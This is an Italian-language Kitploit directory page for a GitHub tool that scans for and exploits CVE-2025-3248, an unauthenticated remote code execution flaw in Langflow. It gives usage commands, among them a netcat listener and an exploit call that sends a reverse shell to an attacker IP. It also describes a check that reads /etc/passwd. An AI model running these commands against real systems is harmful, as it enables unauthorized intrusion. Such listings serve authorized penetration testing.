Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/r0otk3r/cve-2025-3248
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Scanner ed exploit per CVE-2025-3248, una RCE non autenticata in Langflow AI. Include un controllo vulnerabilità e un generatore di payload reverse shell per test di sicurezza autorizzati.

11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-3248: Langflow - Esecuzione Remota di Codice (RCE) non autenticata

Questa repository contiene due script Python:

  • LangflowCheck.py: Uno scanner che verifica la presenza di istanze Langflow AI vulnerabili a CVE-2025-3248.
  • exploit.py: Un exploit funzionante per reverse shell su target Langflow vulnerabili.

Riepilogo

CVE-2025-3248 è una vulnerabilità critica in Langflow AI che consente ad attaccanti non autenticati di eseguire codice Python arbitrario da remoto tramite un payload appositamente costruito inviato a /api/v1/validate/code.


File

LangflowCheck.py

  • Verifica se un target è vulnerabile tentando di eseguire un payload inoffensivo che legge /etc/passwd.
  • Può scansionare un singolo target o una lista di URL.
  • Supporta l'output dei target vulnerabili in un file.

exploit.py

  • Invia un payload reverse shell all'endpoint vulnerabile.
  • Richiede l'IP dell'attaccante (lhost) e la porta del listener (lport).
  • Registra l'attività in exploit.log.
  • Supporta il controllo del listener prima di inviare il payload.

Utilizzo

1. Installare i requisiti

root@kitploit:~
pip install -r requirements.txt

2. Eseguire lo scanner di vulnerabilità

Singolo URL

root@kitploit:~
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

1

Target multipli

root@kitploit:~
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

tt

3. Sfruttare un target

Per prima cosa, avviare un listener

root@kitploit:~
sudo nc -nvlp 4444

l

Quindi, eseguire l'exploit:

root@kitploit:~
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

2

Se il target è vulnerabile, si dovrebbe ricevere una shell. root

⚠️ Disclaimer

Questo exploit è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Non utilizzarlo contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test.


Canali Ufficiali

  • YouTube @rootctf
  • X @r0otk3r
Scarica lo strumento